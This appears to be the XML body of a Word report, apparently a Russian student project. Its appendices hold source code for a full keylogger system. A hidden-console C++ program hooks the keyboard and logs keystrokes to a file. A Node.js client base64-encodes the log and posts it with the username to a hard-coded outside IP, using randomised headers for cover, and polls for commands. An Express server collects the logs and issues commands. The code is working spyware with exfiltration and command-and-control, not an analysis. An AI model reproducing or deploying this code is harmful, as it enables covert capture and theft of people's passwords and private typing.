    <w:p w14:paraId="163931E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SHIFT]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D46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CONTROL || key == VK_LCONTROL || key == VK_RCONTROL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D25A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CTR]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F052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ESCAPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F1DB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SC]";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143E1E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    else if(key == VK_END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E2E6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END]";  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0086732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HOME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FC15F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HOME]";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E46E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LEFT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368766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LEFT]";   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699460D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RIGHT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53A36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RIGHT]";   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB12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UP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA9B0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UP]"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9709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VK_DOWN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08905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[DOWN]";     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2533648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190 || key == 110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA35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.";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781D52A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 if(key == 189 || key == 109)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8E1C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-";          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB6F8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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F28A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wchar_t crrKey[2] = {0}; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9BF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BYTE keyboardState[256]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2AFF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4F92FF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GetKeyboardState(keyboardState);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556783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7F39897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nt result = ToUnicodeEx(key, key, keyboardState, crrKey, 1, 0, keyboatdLayout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5BD3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26DD22F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f (result &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92C2E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char utf8_str[8] = {0}; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C1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31DF0C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nt len = WideCharToMultiByte(CP_UTF8, 0, crrKey, -1, utf8_str, sizeof(utf8_str), NULL, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA995B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3AE2895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if (len &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCC8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    file &lt;&lt; utf8_str; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2871DD5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33440D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54C8724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8D4CD0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6CA917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file.flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A2DE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6FF19C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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638CEFF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0DE963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634D0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3255F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LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE0771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nCode &gt;= 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45120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if(wParam == WM_KEYDOWN){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD0A5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kbStruct = *(KBDLLHOOKSTRUCT*)lParam;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AB0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23F27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    Save(kbStruct.vkCode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2019076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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E149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7A9EA8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6C983E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7AFEEF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236E3A7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56C4BEF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return CallNextHookEx(hook, nCode, wParam, lParam);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDFE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638274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1EC2C66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>int main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142F23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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70528DF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file.open("D:\\Clientkeylog.txt", ios_base::app | ios_base::binary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1DAE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FCB89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file.tellp() == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71FB3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file &lt;&lt; "\xEF\xBB\xBF"; // UTF-8 BOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BFA8A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24B6CF1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143266F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ShowWindow(FindWindowA("ConsoleWindowClass", NULL), SW_HIDE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4D68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0AC6560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if (!(hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0))){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0114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    MessageBoxA(NULL, "Someting has gone wrong!", "Error", MB_ICONERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004BC5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA62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495222A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MSG message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0895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</w:p>
    <w:p w14:paraId="375B01E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 while(GetMessage(&amp;message, NULL, 0, 0)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39649E3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SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00631A74">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416464C" w14:textId="77777777" w:rsidR="00631A74" w:rsidRPr="00631A74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  <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00631A74">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38624B33" w14:textId="4593B2CB" w:rsidR="0025552A" w:rsidRPr="00E36F43" w:rsidRDefault="00631A74" w:rsidP="00631A74">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00631A74">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBA8D6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44B8F441" w14:textId="77777777" w:rsidR="0025552A" w:rsidRPr="0025552A" w:rsidRDefault="0025552A" w:rsidP="0025552A">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067F4BA4" w14:textId="77777777" w:rsidR="00A501F0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  <w:r w:rsidRPr="0025552A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A501F0" w:rsidRPr="0025552A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8586E0" w14:textId="77777777" w:rsidR="0025552A" w:rsidRPr="0025552A" w:rsidRDefault="0025552A" w:rsidP="0025552A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</w:p>
    <w:p w14:paraId="09943757" w14:textId="77777777" w:rsidR="00A501F0" w:rsidRPr="00CA7FAD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Б</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BB0AB" w14:textId="07FF4470" w:rsidR="00A501F0" w:rsidRPr="00AA6BA0" w:rsidRDefault="00A501F0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="00631A74" w:rsidRPr="00631A74">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>клиента для передачи данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F553C1B" w14:textId="77777777" w:rsidR="009C4AC8" w:rsidRPr="00CA7FAD" w:rsidRDefault="009C4AC8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hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7126D8AD" w14:textId="1EE4F842" w:rsidR="00631A74" w:rsidRPr="00631A74" w:rsidRDefault="00C23278" w:rsidP="00631A74">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E36F43">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00631A74" w:rsidRPr="00631A74">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const axios = require("axios");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A536B3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fs = require("fs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D442A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os = require("os");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2D480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PATH = `D://Clientkeylog.txt`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332575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URL = "http://91.149.140.29:24242";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C9F9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LONG_POLL_TIMEOUT = 300000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93EDB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912D78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POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E408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sendData = async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51354C3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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAE2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data = getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109706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 (!data) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6B0D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4A224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await axios.post(`${URL}/data`, data, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12149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headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE0A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User-Agent": getRandom(userAgents),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC281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Referer": getRandom(referers),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A06D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": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354565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Accept-Language": "en-US,en;q=0.9",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45804BD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    "Content-Type": "application/json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E9B4C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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C9B3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5000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8C0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1936F9C4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D1885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fs.writeFileSync(PATH, '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BDF4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catch{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72474E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348D8B4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3523FD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40CF5C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E1225D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getData = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941895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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F5E5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(!fs.existsSync(PATH)) return null; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0414351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64547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fileData = fs.readFileSync(PATH, "utf8");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC401E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8929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(fileData.trim() === "") return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508CFD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E1B210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let base64data = Buffer.from(fileData, 'utf8').toString('base64');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE2DC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DBE31D6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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AA7C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id: os.userInfo().username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66541AC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data: base64data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393D3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920111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catch{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C80A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return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221B7E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1298FC5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1215BDA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71A331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5 min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73260D3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setInterval(() =&gt; sendData(), 300000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D68C8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D975F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//LONG POLLING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B90B3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getCommand = async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09512BA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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03B37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const res = await axios.get(`${URL}/longpull?id=${os.userInfo().username}`, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0930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timeout: LONG_POLL_TIMEOUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A854FA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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274E3102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7DBAE40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if(res.data.action === "sendData"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBCE1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    await sendData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF376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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE4B5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2CCC3B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getCommand();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647DE48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4CB5EC9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 catch{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A41F78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    setTimeout(getCommand, 1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1E95B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2236E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04A0220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0E45C9D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getCommand();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D4DD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648114C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function getRandom(arr) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47076C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return arr[Math.floor(Math.random() * arr.length)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E362F5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685811BD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15AD7D78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userAgents = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB32E19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) AppleWebKit/537.36 Chrome/123.0.0.0 Safari/537.36",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC563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Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628358D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Linux; Android 11; SM-A515F) AppleWebKit/537.36 Chrome/123.0.0.0 Mobile Safari/537.36",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4DF90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iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Version/17.0 Mobile/15E148 Safari/604.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443189E1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Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 Version/17.0 Safari/605.1.15"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B834C2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lastRenderedPageBreak/>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DAF6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</w:p>
    <w:p w14:paraId="230F4C4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const referers = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE004F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google.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E993C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youtube.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06997807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facebook.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E674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instagram.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEDEF1A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stackoverflow.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FABB7E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github.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7C523" w14:textId="77777777" w:rsidR="00631A74" w:rsidRPr="00631A74" w:rsidRDefault="00631A74" w:rsidP="00631A74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 xml:space="preserve">    "https://www.reddit.com/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2507A9" w14:textId="056F3A6D" w:rsidR="00095ED0" w:rsidRPr="00095ED0" w:rsidRDefault="00631A74" w:rsidP="00095ED0">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00631A74">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r w:rsidR="00095ED0" w:rsidRPr="00095ED0">
        <w:rPr>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EEECB6" w14:textId="5AA3C678" w:rsidR="00C23278" w:rsidRPr="00E36F43" w:rsidRDefault="00C23278" w:rsidP="00631A74">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFBC302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874E2BE" w14:textId="77777777" w:rsidR="00C23278" w:rsidRP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72B63A5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69A9BDD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45A4ED7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78F7AF9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66D9FBC" w14:textId="77777777" w:rsidR="00C23278" w:rsidRDefault="00C23278" w:rsidP="000B75DC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695E41C" w14:textId="5C0F120D" w:rsidR="00C23278" w:rsidRDefault="00C23278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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78487FB7" w14:textId="77777777" w:rsidR="00095ED0" w:rsidRPr="0025552A" w:rsidRDefault="00095ED0" w:rsidP="00095ED0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14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10587A55" w14:textId="29FD4C03" w:rsidR="00095ED0" w:rsidRPr="00CA7FAD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В</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59C341" w14:textId="557B6B56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сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD19689" w14:textId="5588ECD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7B522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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B00A1C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cors = require('cors');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B92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fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284AD8A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ath = require("path");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A672C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EventEmitter = require('events');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F6E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D240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PORT = 24242;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF7F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DIR_PATH = path.join(__dirname, "../Logs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E34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E04BF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emitter = new EventEmitter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37223E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7B240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const server = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F09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use(cors());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3920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use(express.json());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA271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E82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listen(PORT, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15438B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ole.log(`Server is started on port ${PORT}!`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CE2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9CB2C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27F098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post("/data", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D37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{id, data} = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066A0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5C1A1D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let originData = Buffer.from(data, 'base64').toString('utf8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EABF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8D277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Path = path.join(DIR_PATH, `${id}.txt`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C2D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E6DE8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fs.appendFile(filePath, originData, (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D1F1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err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F6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console.error("Ошибка записи в файл:", err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC1A05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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(500).</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>("Ошибка сервера при записи файла");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013EF01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</w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00095ED0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D2D4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res.status(200).send("OK");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F840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5B4876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05FF9F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3A8E3B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D8361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emitter.setMaxListeners(50); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D1DF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D828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get("/longpull", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E8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clientId = req.query.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C245B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if (!clientId) return res.status(400).json({ error: "Client ID is required" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB3D2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C5AD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timeout = setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1BB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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD51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s.status(204).end();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2437C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emitter.removeListener(`getdata:${clientId}`, sendMes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C17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catch{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAC8C4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C8F01A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653E0B9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184EE5F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, 300000); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D7F25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79D3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var sendMes = (message) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A9DC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try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372435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if (res.headersSent) return; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EF3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clearTimeout(timeout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14185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s.json(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05430AB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catch{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF3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477C0F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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132DB0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2708D1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emitter.once('getdata', sendMes);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18603CD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emitter.once(`getdata:${clientId}`,sendMes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B45B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2E7E8B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7B95C7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tInterval(() =&gt; emitter.emit('getdata', { action: "sendData" }), 610000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C8A2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AED0D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post("/command", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33251F7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const {clientId, action} = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234EAC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if(clientId === "all"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33209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emitter.emit('getdata', {action});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DDC7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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FA24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emitter.emit(`getdata:${clientId}`, {action});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6341929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65A1ED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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A7D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res.status(200).send("OK");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490B115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8A51F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01B0B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get("/getLogs", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745CF09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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87F62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const files = fs.readdirSync(DIR_PATH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FC1B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.filter(file =&gt; file.endsWith('.txt'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AC61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          .map(file =&gt; file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A9E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        res.json(files);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08414EB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 catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7534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console.error('Error reading logs directory:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F3B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s.status(500).json([]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6FDF3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7DD3DF5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442C88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B869D0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get("/getFile", (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764375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14FCCC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req.query.file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DD9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295D3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ilename) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1A4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res.status(400).json({ error: "Filename parameter is required" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA96A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3769B48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D3EC0C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ilename.endsWith('.txt')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76A58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res.status(400).json({ error: "Only .txt files are allowed" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B903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1B645B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689C4D7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safeFilename = path.normalize(filename).replace(/^(\.\.(\/|\\|$))+/, '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F55014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Path = path.join(DIR_PATH, safeFilename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20123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6670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s.existsSync(filePath)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D01B57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turn res.status(404).json({ error: "File not found" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059ABB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C260B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A8A09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fs.readFile(filePath, 'utf8', (err, data) =&gt; {     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD0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res.json({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348AC1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filename: filename,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C3F8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  content: data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BED06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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EB50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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65836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7E530D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5326EC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ole.error("Server error:", error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FB8E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res.status(500).json({ error: "Internal server error" });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875FB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140CE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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42DD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637BB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>server.delete('/delFile', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A8B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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D6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name = req.query.file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702FE4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68E0DE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ilename) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B93B8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res.status(400).json({ error: "Filename parameter is required" });</w:t>
      </w:r>
    </w:p>
